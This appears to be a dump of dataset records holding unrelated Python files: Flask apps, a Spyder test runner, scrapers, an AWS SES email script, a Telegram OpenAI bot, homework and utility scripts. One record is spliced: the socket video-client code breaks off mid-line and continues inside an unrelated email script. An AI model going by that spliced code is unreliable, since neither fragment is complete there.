lang.lang['event_header_your_queue'],\n get_state_str_current, balloons\n )\n balloons = db.balloons_new(event_id)\n balloons = list (map (Balloon, reversed (balloons)))\n content += get_balloons_html(\n lang.lang['event_header_offer'],\n get_state_str_queue, balloons\n )\n balloons = db.balloons_old(event_id)\n balloons = list (map (Balloon, balloons))\n content += get_balloons_html(\n lang.lang['event_header_queue'],\n get_state_str_queue, balloons\n )\n\n db.close()\n response = make_response(render_template(\n 'template.html',\n title=event['name'],\n base=config.base_url,\n content=content\n ))\n token = auth.create_token(user_id, add_random=True)\n response.set_cookie('ball_token', token)\n return response\n\n\n@ball.route('/event/<event>/standings')\ndef 
event_standings(event):\n user_id, auth_html, user_ok = check_auth(request)\n if not user_ok:\n return redirect(url_for('index'))\n event_id = int(event)\n db = DB()\n try:\n e = db.event(event_id)\n except KeyError:\n return redirect(url_for('index'))\n event = {\n 'name': e[1],\n 'state': e[2],\n 'url': e[3]\n }\n problems_header = []\n problems = db.problems(event_id)\n for p in problems:\n problems_header.append(design.standings_problem(\n name_full=p['name'],\n name_short=p['letter']\n ))\n try:\n p['fts'] = db.fts(event_id, problem_id=p['id'])\n except KeyError:\n pass\n\n oks = {}\n for b in db.balloons(event_id):\n oks[(b['team_id'], b['problem_id'])] = (b['id'], b['time_local'])\n\n standings_header = ''.join(problems_header)\n teams = []\n for t in db.teams(event_id):\n score = 0\n penalty = 0\n team_row = []\n for p in problems:\n key = (t['id'], p['id'])\n if key in oks:\n ok_id, time = oks[key]\n team_row.append(design.standings_yes(\n time=int(time),\n fts=ok_id == p['fts']\n ))\n score += 1\n penalty += int(time / 60) # TODO: incorrect: does not assume previous attempts\n else:\n team_row.append(design.standings_nope())\n teams.append ([t['long_name'], ''.join(team_row), score, penalty, True, False, 1])\n\n teams = list(sorted(teams, key=lambda t: (-t[2], t[3])))\n for i in range(1, len(teams)):\n teams[i][4] = not teams[i - 1][4]\n if teams[i][2] == teams[i - 1][2] and teams[i][3] == teams[i - 1][3]:\n teams[i][6] = teams[i - 1][6]\n else:\n teams[i][6] = i + 1\n for i in range(len(teams) - 2, -1, -1):\n if teams[i][2] == teams[i + 1][2]:\n teams[i][5] = teams[i + 1][5]\n else:\n teams[i][5] = not teams[i + 1][5]\n\n teams_list = []\n for name, problems, score, penalty, even, block_even, rank in teams:\n teams_list.append(design.standings_team(\n row=even,\n block=block_even,\n name=name,\n problems=problems,\n rank=rank,\n score=score,\n penalty=penalty\n ))\n even = not even\n standings_body = ''.join(teams_list)\n content = design.warning(\n message=lang.lang['warning_no_penalty_attempts']\n ) + design.standings_table(\n header=standings_header,\n body=standings_body\n )\n db.close()\n return page(\n title=event['name'],\n content=content\n )\n\n\nuser_cache = {}\ndef check_auth(request):\n auth_html = design.auth(url=url_for('method_auth'))\n try:\n user_id = request.cookies.get('ball_user_id')\n auth_token = request.cookies.get('ball_auth_token')\n except:\n return None, auth_html, False\n if not auth.check(user_id, auth_token):\n return None, auth_html, False\n # need to invalidate cache in action_access_*\n # if user_id in user_cache:\n # return user_cache[user_id]\n auth_html = design.auth_ok(user=str(user_id))\n user_ok = user_id in config.allowed_users\n if not user_ok:\n db = DB()\n user_ok = db.volunteer_get(user_id)\n db.close(commit=True)\n user_cache[user_id] = user_id, auth_html, user_ok\n return user_cache[user_id]\n\n\n@ball.route('/auth')\ndef method_auth():\n user_id, auth_html, user_ok= check_auth(request)\n content = design.auth_link(url=url_for('auth_vk_start'), label='VK') + \\\n design.auth_link(url=url_for('auth_google_start'), label='Google')\n return render_template(\n 'template.html',\n title=lang.lang['auth'],\n auth=auth_html,\n base=config.base_url,\n content=content)\n\n\n@ball.route('/auth/vk/start')\ndef auth_vk_start():\n return redirect(auth.vk.url)\n\n\n@ball.route('/auth/vk/done')\ndef auth_vk_done():\n try:\n code = request.args.get('code', '')\n except:\n code = 'None'\n try:\n user_id = auth.vk.do (code)\n except 
auth.AuthentificationError as error:\n error_content = 'Failed auth: ' + str(error)\n return render_template(\n 'template.html',\n title='Failed auth',\n base=config.base_url,\n content=error_content)\n auth_token = auth.create_token(user_id)\n resp = make_response(redirect(url_for('index')))\n resp.set_cookie('ball_auth_token', auth_token)\n resp.set_cookie('ball_user_id', user_id)\n return resp\n\n\n@ball.route('/auth/google/start')\ndef auth_google_start():\n return redirect(auth.google.url)\n\n\n@ball.route('/auth/google/done')\ndef auth_google_done():\n try:\n code = request.args.get('code', '')\n except:\n code = 'None'\n try:\n user_id = auth.google.do(code)\n except auth.AuthentificationError as error:\n error_content = 'Failed auth: ' + str(error)\n return render_template('template.html',\n title='Failed auth',\n base=config.base_url,\n content=error_content)\n auth_token = auth.create_token(user_id)\n resp = make_response(redirect(url_for('index')))\n resp.set_cookie('ball_auth_token', auth_token)\n resp.set_cookie('ball_user_id', user_id)\n return resp\n\nclass LoggerHandler (logging.StreamHandler):\n def emit (x, record):\n logging.StreamHandler.emit (x, record)\n\nif __name__ == '__main__':\n webc = config.config['web']\n ball.debug = webc['debug']\n ball.logger.setLevel(logging.DEBUG)\n handler = LoggerHandler()\n handler.setLevel(logging.DEBUG)\n ball.logger.addHandler(handler)\n ball.run(host=webc['host'], port=webc['port'])\n\n\n","repo_name":"testsys/ball","sub_path":"ball.py","file_name":"ball.py","file_ext":"py","file_size_in_byte":20842,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"30481963490","text":"import os\nimport tempfile\n\n# Third party imports\nfrom qtpy.QtCore import (QObject, QProcess, QProcessEnvironment, QTextCodec,\n Signal)\nfrom spyder.py3compat import to_text_string\nfrom spyder.utils.misc import get_python_executable\n\ntry:\n from importlib.util import find_spec as find_spec_or_loader\nexcept ImportError: # Python 2\n from pkgutil import find_loader as find_spec_or_loader\n\n\nclass Category:\n \"\"\"Enum type representing category of test result.\"\"\"\n\n FAIL = 1\n OK = 2\n SKIP = 3\n PENDING = 4\n\n\nclass TestResult:\n \"\"\"Class representing the result of running a single test.\"\"\"\n\n def __init__(self, category, status, name, message='', time=None,\n extra_text='', filename=None, lineno=None):\n \"\"\"\n Construct a test result.\n\n Parameters\n ----------\n category : Category\n status : str\n name : str\n message : str\n time : float or None\n extra_text : str\n filename : str or None\n lineno : int or None\n \"\"\"\n self.category = category\n self.status = status\n self.name = name\n self.message = message\n self.time = time\n extra_text = extra_text.rstrip()\n if extra_text:\n self.extra_text = extra_text.split(\"\\n\")\n else:\n self.extra_text = []\n self.filename = filename\n self.lineno = lineno\n\n def __eq__(self, other):\n \"\"\"Test for equality.\"\"\"\n return self.__dict__ == other.__dict__\n\n\nclass RunnerBase(QObject):\n \"\"\"\n Base class for running tests with a framework that uses JUnit XML.\n\n This is an abstract class, meant to be subclassed before being used.\n Concrete subclasses should define executable and create_argument_list(),\n\n All communication back to the caller is done via signals.\n\n Attributes\n ----------\n module : str\n Name of Python module for test framework. 
This needs to be defined\n before the user can run tests.\n name : str\n Name of test framework, as presented to user.\n process : QProcess or None\n Process running the unit test suite.\n resultfilename : str\n Name of file in which test results are stored.\n\n Signals\n -------\n sig_collected(list of str)\n Emitted when tests are collected.\n sig_collecterror(list of (str, str) tuples)\n Emitted when errors are encountered during collection. First element\n of tuple is test name, second element is error message.\n sig_starttest(list of str)\n Emitted just before tests are run.\n sig_testresult(list of TestResult)\n Emitted when tests are finished.\n sig_finished(list of TestResult, str)\n Emitted when test process finishes. First argument contains the test\n results, second argument contains the output of the test process.\n sig_stop()\n Emitted when test process is being stopped.\n \"\"\"\n\n sig_collected = Signal(object)\n sig_collecterror = Signal(object)\n sig_starttest = Signal(object)\n sig_testresult = Signal(object)\n sig_finished = Signal(object, str)\n sig_stop = Signal()\n\n def __init__(self, widget, resultfilename=None):\n \"\"\"\n Construct test runner.\n\n Parameters\n ----------\n widget : UnitTestWidget\n Unit test widget which constructs the test runner.\n resultfilename : str or None\n Name of file in which to store test results. If None, use default.\n \"\"\"\n QObject.__init__(self, widget)\n self.process = None\n if resultfilename is None:\n self.resultfilename = os.path.join(tempfile.gettempdir(),\n 'unittest.results')\n else:\n self.resultfilename = resultfilename\n\n @classmethod\n def is_installed(cls):\n \"\"\"\n Check whether test framework is installed.\n\n This function tests whether self.module is installed, but it does not\n import it.\n\n Returns\n -------\n bool\n True if framework is installed, False otherwise.\n \"\"\"\n return find_spec_or_loader(cls.module) is not None\n\n def get_versions(self):\n \"\"\"\n Return versions of framework and its installed plugins.\n\n This function must only be called for installed frameworks.\n\n Returns\n -------\n list of str\n Strings with framework or plugin name, followed by\n its version.\n \"\"\"\n raise NotImplementedError\n\n def create_argument_list(self):\n \"\"\"\n Create argument list for testing process (dummy).\n\n This function should be defined before calling self.start().\n \"\"\"\n raise NotImplementedError\n\n def _prepare_process(self, config, pythonpath):\n \"\"\"\n Prepare and return process for running the unit test suite.\n\n This sets the working directory and environment.\n \"\"\"\n process = QProcess(self)\n process.setProcessChannelMode(QProcess.MergedChannels)\n process.setWorkingDirectory(config.wdir)\n process.finished.connect(self.finished)\n if pythonpath:\n env = QProcessEnvironment.systemEnvironment()\n old_python_path = env.value('PYTHONPATH', None)\n python_path_str = os.pathsep.join(pythonpath)\n if old_python_path:\n python_path_str += os.pathsep + old_python_path\n env.insert('PYTHONPATH', python_path_str)\n process.setProcessEnvironment(env)\n return process\n\n def start(self, config, pythonpath):\n \"\"\"\n Start process which will run the unit test suite.\n\n The process is run in the working directory specified in 'config',\n with the directories in `pythonpath` added to the Python path for the\n test process. The test results are written to the file\n `self.resultfilename`. 
The standard output and error are also recorded.\n Once the process is finished, `self.finished()` will be called.\n\n Parameters\n ----------\n config : TestConfig\n Unit test configuration.\n pythonpath : list of str\n List of directories to be added to the Python path\n\n Raises\n ------\n RuntimeError\n If process failed to start.\n \"\"\"\n self.process = self._prepare_process(config, pythonpath)\n executable = get_python_executable()\n p_args = self.create_argument_list()\n try:\n os.remove(self.resultfilename)\n except OSError:\n pass\n self.process.start(executable, p_args)\n running = self.process.waitForStarted()\n if not running:\n raise RuntimeError\n\n def finished(self):\n \"\"\"\n Called when the unit test process has finished.\n\n This function should be implemented in derived classes. It should read\n the results (if necessary) and emit `sig_finished`.\n \"\"\"\n raise NotImplementedError\n\n def read_all_process_output(self):\n \"\"\"Read and return all output from `self.process` as unicode.\"\"\"\n qbytearray = self.process.readAllStandardOutput()\n locale_codec = QTextCodec.codecForLocale()\n return to_text_string(locale_codec.toUnicode(qbytearray.data()))\n\n def stop_if_running(self):\n \"\"\"Stop testing process if it is running.\"\"\"\n if self.process and self.process.state() == QProcess.Running:\n self.process.kill()\n self.sig_stop.emit()\n","repo_name":"miszczube/spyder-unittest","sub_path":"spyder_unittest/backend/runnerbase.py","file_name":"runnerbase.py","file_ext":"py","file_size_in_byte":7594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"94"} +{"seq_id":"72913397108","text":"import socket\nimport sys\nimport cv2\nimport pickle\nimport numpy as np\nimport struct ## new\n\nHOST = '192.168.1.5'\nPORT = 8089\n\nstream_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\nif len(sys.argv) == 2:\n print(sys.argv[1])\n try: \n PORT = int(sys.argv[1])\n except:\n print('Incorrect PORT, trying on 8089') \n\nstream_socket.connect((HOST, PORT))\n\ndata = bytes()\npayload_size = struct.calcsize('\"\n\n for student in data:\n\n recipient = student['email']\n\n if validate_email(recipient):\n\n subject = \"TEST! Welcome {0} to Success Academy Charter Schools\".format(student['Name'])\n\n # The email body for recipients with non-HTML email clients.\n body_text = (\"This is a Test (Python) welcome email!\\r\\n\"\n \"This email was sent with Amazon SES using the \"\n \"AWS SDK for Python (Boto).\"\n )\n\n # The HTML body of the email.\n body_html = \"\"\"\n \n \n

<html>\n <head></head>\n <body>\n <h1>TEST welcome to Success Academy {0}</h1>\n <p>This email was sent with\n <a href='https://aws.amazon.com/ses/'>Amazon SES</a> using the\n <a href='https://aws.amazon.com/sdk-for-python/'>\n AWS SDK for Python (Boto)</a>.</p>
\n </body>\n </html>\n \"\"\".format(student['Name'])\n\n # The character encoding for the email.\n char_set = \"UTF-8\"\n\n # Create a new SES resource and specify a region.\n client = boto3.client('ses', region_name=aws_region)\n\n # Try to send the email.\n try:\n # Provide the contents of the email.\n response = client.send_email(\n Destination={\n 'ToAddresses': [\n recipient,\n ],\n },\n Message={\n 'Body': {\n 'Html': {\n 'Charset': char_set,\n 'Data': body_html,\n },\n 'Text': {\n 'Charset': char_set,\n 'Data': body_text,\n },\n },\n 'Subject': {\n 'Charset': char_set,\n 'Data': subject,\n },\n },\n Source=sender,\n\n )\n # Display an error if something goes wrong.\n except botocore.exceptions.ClientError as e:\n print(e.response['Error']['Message'])\n else:\n print(\"Email sent! Message ID:\"),\n print(response['MessageId'])\n else:\n print('Invalid Student {0} email {1}'.format(student['ID'], student['email']))\n\n\ndef main():\n student_data = get_students()\n send_student_email(student_data)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"KitCassetta/AntFarm","sub_path":"SuccessAcadamyDevActivity/AntCassetta_SuccesAcademyActivity/WelcomeStudentsAWS.py","file_name":"WelcomeStudentsAWS.py","file_ext":"py","file_size_in_byte":4227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
+{"seq_id":"33147056778","text":"# [Problem] Download the images from the Naver weather page.\n# Save location : d:\\img\\(today's date)\n# File name : (hour)(minutes)(milliseconds).jpg\nfrom bs4 import BeautifulSoup\nfrom urllib import request\nfrom datetime import date, datetime\n# import requests\nimport os\n\nurl = 'https://search.naver.com/search.naver?where=nexearch&sm=top_hty&fbm=1&ie=utf8&query=%EB%82%A0%EC%94%A8'\nhtml = request.urlopen(url).read()\nsoup = BeautifulSoup(html, 'html.parser')\n\ntoday = str(date.today()).replace('-', '')\nfolder_path = f'd:\\\\img\\\\{today}\\\\'\n\n# video_list = soup.find('div', class_='list_square')\nimg_list = soup.find_all('img', class_='api_img')\n\n# if not os.path.exists(save_path):\n# os.makedirs(save_path)\nos.makedirs(folder_path, exist_ok=True)\n\nfor img in img_list:\n save_time = str(datetime.now().strftime('%H%M%f'))\n save_path = os.path.join(folder_path, save_time+'.png')\n request.urlretrieve(img['data-lazysrc'], save_path)\n","repo_name":"fkdlrj125/webservice","sub_path":"python/p230425/img_download_quiz01.py","file_name":"img_download_quiz01.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
+{"seq_id":"73732552950","text":"from django.db import models\nfrom django.forms import DateTimeField\n\n# Create your models here.\nclass Blog(models.Model):\n title = models.CharField(max_length=20)\n post = models.CharField(max_length=200)\n videofile= models.FileField(upload_to='videos/', null=True)\n image= models.ImageField(upload_to = 'images/',null = True)\n event_date = DateTimeField(input_formats=[\"%d %b %Y %H:%M:%S %Z\"])\n\n @classmethod\n def get_all(cls):\n pics = cls.objects.all()\n return pics\n\n def __str__(self):\n return self.caption + str(self.videofile)\n","repo_name":"DavidNganga/wblog","sub_path":"nimo/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
+{"seq_id":"38219051774","text":"import time\nimport numpy as np\nimport pandas as pd\nfrom deep_translator import GoogleTranslator\nfrom langdetect import detect_langs\n\ndef translating(data, 
col_text_name = 'text', tr_language = 'en', save_mode = 'pickle'):\n res = []\n n = 0\n for i in range(len(data[col_text_name])):\n det = detect_langs(data[col_text_name][i])\n if det[0].lang == tr_language and det[0].prob > 0.9:\n res.append(data[\"summary\"][i])\n continue\n\n if (n + 1) % 100 == 0:\n time.sleep(77)\n translated = GoogleTranslator(source='auto', target=tr_language).translate(text=data[col_text_name][i])\n res.append(translated)\n n = n + 1\n data[\"translated_text\"] = res\n if save_mode == 'csv':\n data.to_csv(\"outputs/data_plus_translated.csv\", sep=\",\", index=False)\n else:\n data.to_pickle(\"outputs/data_plus_translated.pickle\")","repo_name":"MgDuck/TS-APP","sub_path":"src/text_to_translate.py","file_name":"text_to_translate.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"27938417896","text":"import logging\n\nfrom config import LOG_FILE\n\n_g_logger = None\n\n\ndef get_logger():\n global _g_logger\n if _g_logger is None:\n logging.basicConfig(filename=LOG_FILE, level=logging.INFO)\n __datetime = \"%Y-%m-%d %H:%M:%S\"\n __format_str = \"%(asctime)s %(levelname).1s [%(filename)s:%(lineno)s] %(message)s\"\n _g_logger = logging.getLogger()\n # stream header\n formater = logging.Formatter(__format_str, __datetime)\n handler = logging.StreamHandler()\n handler.setFormatter(formater)\n _g_logger.addHandler(handler)\n return _g_logger\n\n\nlogger = get_logger()","repo_name":"Lmineor/tiaoji_spider","sub_path":"Slog.py","file_name":"Slog.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"5664114871","text":"import os\nimport pathlib\n\nfrom taksonomia.machine import Machine\n\n\ndef test_machine():\n folder = pathlib.Path('test', 'fixtures', 'corner')\n pid = os.getpid()\n machine = Machine(str(folder), pid)\n assert str(machine)\n assert machine.context()\n assert machine.perf()\n","repo_name":"sthagen/taksonomia","sub_path":"test/test_machine.py","file_name":"test_machine.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"17756340134","text":"from typing import List\n\nimport numpy as np\n\nfrom Data.data import get_answers\n\nwords = get_answers()\n\n\ndef get_remaining_words_guess_known(word_list: List[str], wordle_state):\n # Word list has to be lower case.\n guess = [x.lower() for x in wordle_state[0]]\n correct_letters = [x.lower() for x in wordle_state[1]]\n common_letters = \"\".join(wordle_state[2]).replace(\" \", \"\").lower()\n uncommon_letters = list(set(guess) - set(common_letters) - set(\"\".join(correct_letters).replace(\" \", \"\")))\n\n new_list = [w for w in word_list if all(c in w for c in common_letters)]\n new_list = [w for w in new_list if not any(c in w for c in uncommon_letters)]\n new_list = [w for w in new_list if all(c in w for c in \"\".join(correct_letters).replace(\" \", \"\"))]\n\n final_list = set(new_list)\n for word in new_list:\n w = list(word)\n\n for i in range(5):\n if not w[i] != correct_letters[i] and correct_letters[i] != \" \":\n final_list.add(word)\n\n return np.array(list(final_list))\n\n\ndef get_possible_words(word, word_list):\n \"\"\"\n Gets list of without words that do not provide information given\n the word param.\n :param word: Word.\n :param word_list: Word List.\n :return:\n \"\"\"\n\n return [w for w in 
word_list if any(c in w for c in word)]\n","repo_name":"EMAT31530/ai-group-project-group-2","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"72465928948","text":"class Solution:\n def longestIdealString(self, s: str, k: int) -> int:\n n = len(s)\n ans = 1\n dp = [1] * n\n d = {s[0]: 0}\n for i in range(1, n):\n a = ord(s[i])\n for b in ascii_lowercase:\n if abs(a - ord(b)) > k:\n continue\n if b in d:\n dp[i] = max(dp[i], dp[d[b]] + 1)\n d[s[i]] = i\n return max(dp)\n","repo_name":"doocs/leetcode","sub_path":"solution/2300-2399/2370.Longest Ideal Subsequence/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":25791,"dataset":"github-code","pt":"94"} +{"seq_id":"19577106999","text":"import os\nimport re\n\nfrom pyrogram import Client, filters\nfrom pyrogram.enums import ParseMode\n\nfrom openai.error import InvalidRequestError\n\nfrom utils import formatDescription\nfrom openAI import generateImageUrls, generateVariationUrls\n\n\nV_NEXT = False\n\n@Client.on_message(filters.command(\"variation\"))\nasync def variations_(bot, message):\n global V_NEXT\n V_NEXT = True\n reply = \"Send the base image and a caption in the format below.\\n\\n`%\\n\\n> Note: The image needs to be a square PNG file that's less than 4MB in size.\\n> You can only generate up to 10 images.\\n> There are three acceptable options for the image size: 256x256, 512x512, and 1024x1024.`\"\n await bot.send_message(message.chat.id, reply, parse_mode = ParseMode.MARKDOWN)\n\n\n@Client.on_callback_query(filters.regex(\"Variation\"))\nasync def variations(bot, callback):\n global V_NEXT\n V_NEXT = True\n message = \"Send the base image and a caption in the format below.\\n\\n`%\\n\\n> Note: The image needs to be a square PNG file that's less than 4MB in size.\\n> You can only generate up to 10 images.\\n> There are three acceptable options for the image size: 256x256, 512x512, and 1024x1024.`\"\n await bot.send_message(callback.message.chat.id, message, parse_mode = ParseMode.MARKDOWN)\n\n@Client.on_message(filters.photo)\nasync def sendVariations(bot, message):\n global V_NEXT\n if V_NEXT:\n chat_id = message.chat.id\n pattern = re.compile(r\"[0-9]+%[0-9]+x[0-9]+\", flags=re.I|re.M)\n if pattern.match(message.caption):\n await bot.download_media(message.photo, \"images/photo.png\")\n request = await formatDescription(message.caption, True)\n try:\n await bot.send_message(chat_id, \"Generating Variations 🧭\")\n responses = await generateVariationUrls(\n \"images/photo.png\",\n request[\"n\"],\n request[\"size\"]\n )\n except InvalidRequestError as e:\n await bot.send_message(chat_id, \"âš  You used the wrong syntax. Try again but make sure the caption of the image is in this format. 
'`%`' and don't forget the rules\\n\\n> The image needs to be a square PNG file that's less than 4MB in size.\\n> You can only generate up to 10 images.\\n> There are three acceptable options for the image size: 256x256, 512x512, and 1024x1024.`\\nYou're welcome by the way😉\", parse_mode = ParseMode.MARKDOWN)\n print(e.error)\n else:\n for response in responses:\n await bot.send_photo(chat_id, response['url'])\n os.remove(\"images/photo.png\")\n await bot.send_message(chat_id, \"Here are the images you asked for.\")\n V_NEXT = False\n\n","repo_name":"OluwaFavour/Telegram-OpenAI-Bot","sub_path":"plugins/handlers/variationsButton.py","file_name":"variationsButton.py","file_ext":"py","file_size_in_byte":2885,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"} +{"seq_id":"43313564696","text":"from yahoo import getYahooInfo\nfrom amazon import getAmazonInfo\nimport logging\n\ndef getGoodsCsv(url): \n\n sth = logging.StreamHandler()\n flh = logging.FileHandler('./debug.log')\n logging.basicConfig(level=logging.INFO, handlers=[sth, flh])\n logger = logging.getLogger(__name__)\n logger.info('--- getGoodsCsv start ---')\n\n yahooInfos= getYahooInfo(url)\n\n results = ['Yahoo JAN,Yahoo販売価格,ASIN,Amazon販売価格']\n for yahooInfo in yahooInfos:\n if not yahooInfo['janCode']:\n continue\n\n amazonInfo = getAmazonInfo(yahooInfo['janCode'])\n results.append(','.join([yahooInfo['janCode'], yahooInfo['price'], amazonInfo['asin'], amazonInfo['price']]))\n\n logger.info('--- getGoodsCsv end ---')\n return \"\\n\".join(results)\n\nif __name__ == '__main__':\n csv = getGoodsCsv('https://store.shopping.yahoo.co.jp/bestexcel/search.html')\n print(csv)","repo_name":"murotani-hiroki/python_webdriver","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"36249401430","text":"# -*- coding: utf-8 -*-\n\nimport csv\nimport gzip\nimport numpy as np\nimport numpy.ma as ma\nimport os\nfrom pprint import pprint\nimport sys\n\ndef printProgress(step, total):\n sys.stdout.write('\\r')\n sys.stdout.write(\"%s%%\" % round(1.0*step/total*100,2))\n sys.stdout.flush()\n\n\ndef readCsv(filename, fillValue=None):\n values = np.array([])\n if os.path.isfile(filename):\n print(\"Reading %s...\" % filename)\n lines = []\n f = gzip.open(filename, 'rt', encoding=\"utf8\") if filename.endswith(\".gz\") else open(filename, 'r', encoding=\"utf8\")\n lines = list(f)\n f.close()\n height = len(lines)\n if height > 0:\n width = len(lines[0].split(\",\"))\n values = np.zeros((height, width))\n for i, line in enumerate(lines):\n row = np.zeros(width)\n for j, value in enumerate(line.split(\",\")):\n row[j] = float(value)\n values[i] = row\n\n # mask values that are invalid\n if fillValue is not None:\n values = ma.masked_values(values, fillValue)\n\n return values\n","repo_name":"amnh-sciviz/nasa-ndvi","sub_path":"lib/io_utils.py","file_name":"io_utils.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"1386132557","text":"import argparse\n\nfrom engine import PluginEngine\nfrom pydesktools.win import Win\nfrom util import FileSystem\n\nfrom tkinter import *\nfrom tkinter import ttk\n\n\ndef __description() -> str:\n return \"Create your own anime meta data\"\n\n\ndef __usage() -> str:\n return \"Vrv-meta.py --service vrv\"\n\n\ndef __init_cli() -> argparse.ArgumentParser:\n 
parser = argparse.ArgumentParser(description=__description(), usage=__usage())\n parser.add_argument(\n \"-l\",\n \"--log\",\n default=\"DEBUG\",\n help=\"\"\"\n Specify the log level to use. Default will always be DEBUG; choose between the following options\n CRITICAL, ERROR, WARNING, INFO, DEBUG\n \"\"\",\n )\n\n print(\"FileSystem\", FileSystem)\n parser.add_argument(\n \"-d\",\n \"--directory\",\n default=f\"{FileSystem.get_plugins_directory()}\",\n help=\"\"\"\n (Optional) Supply a directory where plugins should be loaded from. The default is ./plugins\n \"\"\",\n )\n return parser\n\n\ndef __print_program_end() -> None:\n print(\"---End of execution---\")\n\n\ndef __init_app(parameters: dict) -> None:\n PluginEngine(options=parameters).start()\n\n\ndef __init_win() -> None:\n # sets up the main application window\n root = Tk()\n # init function\n Win(root)\n # necessary for everything to appear onscreen and allow users to interact with it.\n root.mainloop()\n\n\nif __name__ == \"__main__\":\n __cli_args = __init_cli().parse_args()\n __init_app({\"log_level\": __cli_args.log, \"directory\": __cli_args.directory})\n __init_win()\n","repo_name":"openHacking/PyDeskTools","sub_path":"src/pydesktools/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"41832431948","text":"# https://www.ziwenxie.site/\n# Script for parsing ZiWenXie's blog\nfrom bs4 import BeautifulSoup\n\norigin = 'https://www.ziwenxie.site/'\n\ndef parseZiWenXie(content=\"\"):\n page = dict()\n if not content:\n return page\n # Get the soup object\n soup = BeautifulSoup(content, 'html.parser')\n # Page title\n page['title'] = soup.title.string\n\n blogs = list()\n blogContainer = soup.find(id='wrapper')\n if blogContainer:\n articles = blogContainer.find_all('article')\n for article in articles:\n blog = dict()\n blog['publishTime'] = article.time.a.string\n blog['id'] = article.h1.a['href']\n blog['href'] = 'https://www.ziwenxie.site' + article.h1.a['href']\n blog['title'] = article.h1.a.string\n blogs.append(blog)\n\n # List of all blogs\n page['blogs'] = blogs\n page['blogCount'] = len(blogs)\n page['origin'] = origin\n return page\n","repo_name":"BaoXuebin/BlogSpider","sub_path":"parse/ZiWenXie.py","file_name":"ZiWenXie.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"14745302020","text":"import tenseal as ts\nimport pickle\n\n# QUESTION: 2\ncontext_q2 = ts.context(ts.SCHEME_TYPE.BFV, poly_modulus_degree=4096, plain_modulus=1032193)\nplain_vector = [138]\nencrypted_vector = ts.bfv_vector(context_q2, plain_vector)\nresult_q2 = encrypted_vector * [914]\n\n# QUESTION: 3\nwith open('R11922138.pkl', 'rb') as f:\n given = pickle.load(f)\ncontext_q3 = ts.context_from(given['context'])\nencrypted_a = ts.bfv_vector_from(context_q3, given['encrypted_a'])\nencrypted_b = ts.bfv_vector_from(context_q3, given['encrypted_b'])\nresult_q3 = encrypted_a * 138 + encrypted_b\n\n# package results\nresult = {\n 'q2_context': context_q2.serialize(save_secret_key=True),\n 'q2_result': result_q2.serialize(),\n 'q3_result': result_q3.serialize()\n}\nwith open('R11922138_a1.pkl', 'wb') as f:\n pickle.dump(result, f)\n# with open('R11922138_a1.pkl', 'rb') as f:\n# given = pickle.load(f)\n# context = ts.context_from(given['q2_context'])\n# print(ts.bfv_vector_from(context, given['q2_result']).decrypt())\n# print(ts.bfv_vector_from(context_q3, 
given['q3_result']))\n","repo_name":"eric070021/2022-Topics-in-Secure-Artificial-Intelligence-Systems","sub_path":"HW1/hw1_part2.py","file_name":"hw1_part2.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"4167283126","text":"from flask import Flask, render_template, request\r\nimport joblib\r\nimport pandas as pd\r\nimport numpy as np\r\nimport csv\r\n\r\napp = Flask(__name__)\r\n\r\nmodel = joblib.load('model.pkl')\r\n\r\n@app.route(\"/\")\r\ndef hello_world():\r\n return render_template(\"index.html\")\r\n\r\n\r\n@app.route('/predict', methods=['POST'])\r\ndef predict():\r\n # Get the input data from the form\r\n experience = request.form['Experience']\r\n education = request.form['Education']\r\n employment = request.form['Employment']\r\n telecommuting = request.form['Telecommuting']\r\n logo = request.form['Logo']\r\n question = request.form['Question']\r\n \r\n \r\n my_dict ={\"telecommuting\": telecommuting, \"has_company_logo\": logo, \"has_questions\": question,\r\n \"employment_type\": employment, \"required_experience\": experience, \"required_education\": education}\r\n \r\n input_data = pd.DataFrame([my_dict])\r\n \r\n prediction = model.predict(input_data)\r\n my_list = prediction.tolist()\r\n prediction_proba = model.predict_proba(input_data)\r\n my_list2 = prediction_proba.tolist()\r\n \r\n with open('new_train_data.csv', 'a') as my_file:\r\n my_file.writelines(f\"{telecommuting},{logo},{question},{employment},{experience},{education}\\n\")\r\n \r\n \r\n if my_list[0] == 1:\r\n answer = f\"This is likely to be a Fraudulent Job Post with an accuracy of {(round(my_list2[0][1], 2) * 100)}%\"\r\n return render_template('results.html', answer=answer)\r\n else:\r\n answer = f\"This is a 